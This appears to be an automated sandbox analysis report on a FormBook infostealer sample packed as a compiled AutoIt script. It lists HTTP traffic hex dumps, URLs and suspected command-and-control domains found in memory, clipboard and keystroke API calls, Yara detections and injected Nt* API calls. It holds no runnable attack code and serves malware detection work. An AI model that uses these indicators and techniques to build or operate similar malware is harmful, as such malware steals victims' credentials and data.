20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 03 Jul 2024 13:59:49 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 03 Jul 2024 13:59:52 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: subst.exe, 00000004.00000002.4163884021.0000000004F4E000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000004A9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: subst.exe, 00000004.00000002.4163884021.0000000004F4E000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000004A9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003F9A000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003AEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: subst.exe, 00000004.00000002.4163884021.0000000004DBC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.000000000490C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI
            Source: UJCHZIamnVz.exe, 00000007.00000002.4165384039.00000000056F7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rodotest2.pro
            Source: UJCHZIamnVz.exe, 00000007.00000002.4165384039.00000000056F7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rodotest2.pro/50i6/
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.jqueryscdns.net/jquery-3.7.1.min.js
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://f385xw.com/register
            Source: subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21879113.js
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: subst.exe, 00000004.00000003.2144578147.0000000007B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003F9A000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003AEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0021425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0021425A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00214458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00214458
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0021425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0021425A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00200219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00200219
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0022CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0022CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: This is a third-party compiled AutoIt script.0_2_001A3B4C
            Source: 7RsDGpyOQk.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 7RsDGpyOQk.exe, 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f85d8368-d
            Source: 7RsDGpyOQk.exe, 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_401808e5-2
            Source: 7RsDGpyOQk.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_75391cc7-3
            Source: 7RsDGpyOQk.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_be0999c3-3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042AF63 NtClose,1_2_0042AF63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B60 NtClose,LdrInitializeThunk,1_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,1_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74340 NtSetContextThread,1_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74650 NtSuspendThread,1_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BA0 NtEnumerateValueKey,1_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B80 NtQueryInformationFile,1_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BF0 NtAllocateVirtualMemory,1_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BE0 NtQueryValueKey,1_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AB0 NtWaitForSingleObject,1_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AF0 NtWriteFile,1_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AD0 NtReadFile,1_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FB0 NtResumeThread,1_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FA0 NtQuerySection,1_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F90 NtProtectVirtualMemory,1_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FE0 NtCreateFile,1_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F30 NtCreateSection,1_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F60 NtCreateProcessEx,1_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EA0 NtAdjustPrivilegesToken,1_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E80 NtReadVirtualMemory,1_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EE0 NtQueueApcThread,1_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E30 NtWriteVirtualMemory,1_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DB0 NtEnumerateKey,1_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DD0 NtDelayExecution,1_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D30 NtUnmapViewOfSection,1_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D10 NtMapViewOfSection,1_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D00 NtSetInformationFile,1_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CA0 NtQueryInformationToken,1_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CF0 NtOpenProcess,1_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CC0 NtQueryVirtualMemory,1_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C00 NtQueryInformationProcess,1_2_03B72C00
